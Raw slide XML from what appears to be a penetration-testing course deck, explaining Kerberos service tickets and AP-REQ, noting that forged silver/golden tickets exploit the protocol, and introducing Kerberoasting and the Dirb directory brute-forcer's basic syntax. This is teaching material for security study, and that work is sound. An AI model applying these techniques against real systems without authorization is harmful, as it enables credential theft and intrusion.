              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service ticket is very similar to TGT – just encrypted with the service hash instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session key used to encrypt the red block – client can decrypt this</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3775303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A0CD6-938D-48FA-B700-88D60ADA5280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>277</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 5 – AP-REQ (Application Request)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123BAEE1-2C32-4E69-B4B9-92272DEF0190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322765" y="1320223"/>
            <a:ext cx="11445563" cy="3270827"/>
            <a:chOff x="322765" y="1758373"/>
            <a:chExt cx="11445563" cy="3270827"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Right 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D810250C-9DE1-483A-8B02-7F4E15E8EF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657050" y="3141775"/>
              <a:ext cx="6877901" cy="1005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E536C8-1B90-4D0F-BE91-7301CD7B674C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5216591" y="1758373"/>
              <a:ext cx="1758815" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AP-REQ</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C35598-BEBC-4EEF-BAD0-69C2C5A0890E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="322765" y="2539262"/>
              <a:ext cx="2246768" cy="2332493"/>
              <a:chOff x="563984" y="2305616"/>
              <a:chExt cx="2246768" cy="2332493"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Graphic 5" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76019EE1-A747-4E35-91AE-62AD8BEF5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984" y="2305616"/>
                <a:ext cx="2246768" cy="2246768"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0448280D-0A73-4959-990C-3326068B605E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1300082" y="4268777"/>
                <a:ext cx="774571" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Client</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F70B42-CD94-42DA-8700-543EF2A1D6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9524344" y="2465846"/>
              <a:ext cx="2243984" cy="2339836"/>
              <a:chOff x="9452716" y="2308400"/>
              <a:chExt cx="2243984" cy="2339836"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Graphic 6" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F881537-E5A7-499B-B350-810C3B367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716" y="2308400"/>
                <a:ext cx="2243984" cy="2243984"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3200B4-E405-491A-968E-C77D3C38FF09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9550839" y="4278904"/>
                <a:ext cx="2056973" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Application Server</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B19C5E-11F8-4F60-A727-E21BCB67BF5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3311340" y="2320789"/>
              <a:ext cx="5569320" cy="2708411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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5EDCE6-C4E6-4B97-BC52-45387AFFA1D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4617539" y="4040758"/>
              <a:ext cx="2965383" cy="764924"/>
              <a:chOff x="4461742" y="2888226"/>
              <a:chExt cx="2965383" cy="764924"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64E1628-D8F6-4377-968C-967AE47DEA5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4680225" y="2888226"/>
                <a:ext cx="2528419" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C5571-EA33-46DD-9CD9-582F0D8444AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4461742" y="3314596"/>
                <a:ext cx="2965383" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with Service Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D142CB6D-353B-46D6-BDB6-BC7678230D37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4362995" y="2645050"/>
              <a:ext cx="3466013" cy="1139432"/>
              <a:chOff x="4196939" y="2011821"/>
              <a:chExt cx="3466013" cy="1139432"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="TextBox 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48F282D-6A19-4C96-AB04-4F648DED3A50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="2011821"/>
                <a:ext cx="2528419" cy="830997"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Username</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Timestamp</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="TextBox 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F812B6-2673-4878-9541-0B5F82E6EF8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4196939" y="2812699"/>
                <a:ext cx="3466013" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with Service Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B10E4C-B1C4-49D4-963D-CA26D1FBD78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4573582"/>
            <a:ext cx="11338560" cy="1759099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Armed with a service ticket, can now request access to applications/resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service decrypts the TGS to check validity, gets the service session key to decrypt the rest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service performs its own authorization check to see if the user has valid permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41712156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7D914-285E-4CBA-8562-D58845D10237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>278</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FACC5BDE-8B12-4E3E-A74B-64FC34ABBFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3E022A-14AA-4232-85A2-77A827D29723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Back-and-forth process using various hashes to encrypt portions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First step: Ticket Granting Ticket for general access, validated by DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second step: Service Tickets (TGS) to specific resources, validated by services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Big downfall: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> aren’t checked – only that the TGT/TGS are valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited with silver/golden tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41364481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91F18-5B58-478D-B301-073D929E5364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>279</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85079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307D4-A411-47E3-9F7C-FD38A9FE85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A297596-EEBE-465B-95AE-296DE92FFEAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A67E3A-9E54-47DE-BC98-158695CB1F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183610" y="1992418"/>
            <a:ext cx="9845248" cy="3627198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE230E1F-9FB7-4973-BF03-05BE8159332F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162560" y="1623086"/>
            <a:ext cx="7183120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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Basic Syntax: </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dirb</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 &lt;</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url</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&gt; &lt;wordlist&gt; -X &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exts</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318093707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FAF093-A37B-4817-AC23-D5CD0C957481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>280</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44145AF4-7098-47BB-A94A-9F07B30352F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Roasting the 3-headed dog</a:t>
            </a:r>
          </a:p>
